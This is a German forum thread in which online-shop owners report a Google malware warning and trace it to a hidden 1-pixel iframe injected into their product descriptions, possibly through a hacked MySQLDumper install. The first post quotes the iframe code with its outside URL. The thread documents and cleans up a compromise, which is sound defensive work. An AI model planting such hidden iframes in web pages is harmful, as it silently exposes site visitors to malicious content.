Moin, Google hat heute morgen meinen Shop blockiert " Malware auf nachfolgender Website Zurzeit auf vinsole.de befindliche Hacker könnten versuchen, gefährliche Programme auf Ihrem Computer zu installieren, um Daten wie Fotos, Passwörter, Nachrichten und Kreditkartendaten zu stehlen oder zu löschen. Weitere Informationen" Ich habe festgestellt, das sich in jeden meiner Artikelbeschreibungen jetzt ein Iframe befindet, welches auf eine andere Seite verlinkt: <iframe src="https://www.dataservices.download/login2.html" style="border:0px #ffffff none;" name="footer" scrolling="no" frameborder="0" marginheight="0px" marginwidth="0px" height="1px" width="1px" allowfullscreen></iframe> Scheint irgendwo ein Leck in Gambio zu sein, oder? Gruß Harald (Kopie an Gambio-Support)
DIe URL ist mir unbekannt, das ist kein Code von uns. Das sieht auch wirklich nicht aus, als sollte das da sein, ich würde auch erstmal einen Hack deines Shops für annehmbar halten. Wir sehen uns das jetzt an, und werden versuchen da zu einer Einschätzung zu gelangen.
Ich habe inzwischen in der Datenbank alle Links in den Artikelbeschreibungen gelöscht. Die Frage ist nun, wo steckt das "Iframe" und wie lösche ich es? Wilken: ist schon klar, das das nicht von euch ist
Wir haben eine Erklärung für das Problem gefunden, sie liegt ausserhalb des Shops. Ticketantwort geht in Kürze zu. Du kannst dann selbst entscheiden, ob du den Problemkreis öffentlich diskutieren magst, das wäre hier grundsätzlich vielleicht nicht schlecht.
Hallo, habe exakt das gleiche Problem. Auch mein Shop wird von Google als Malwarschleuder klassifiziert. Bei mir versteckt sich in Artikelbeschreibungen der gleiche iframe wie oben beschrieben. Vermute, dass das durch eine Hack auf meine mySQLDumper Installation gekommen ist. Der mySQLDumper Ordner ist inzwischen mit htpassword und htaccess gesichert. Langt es nun, wenn ich in der DB überall diesen iFrame rauslösche oder wird der von einem verseuchten Javascript immer wieder neu eingebaut? Wie kann ich das eventuell infizierte Javascript finden?
Hallo Florian, ich habe in der products_description in allen Artikeln das iframe gelöscht. Die Datenbank ist wieder sauber, ein javascript habe ich nicht gefunden. Gruß Harald
Hallo, auch ich habe die Malwarewarnung von Google bei 2 Shops erhalten. Allerdings kann ich keine auffällige IFrames oder anderes feststellen. Auch ein Malwarescan über verschiedene Angebote konnte nichts finden. MySQLDumper (htaccess-geschützt) nutze ich ebenfalls, den nutze ich aber auch bei anderen Shopsystemen wo das Problem noch nicht aufgetaucht ist. Bei der Warnung werden Anzeigen, also Anzeigetext, Keywords, Beschreibung und Links zur jeweiligen Seite aufgelistet, aber nicht genau mitgeteilt was da wirklich das Problem ist. Problembeschreibung: Anzeigenstatus: Abgelehnt Probleme mit der Anzeige: Malware und unerwünschte Software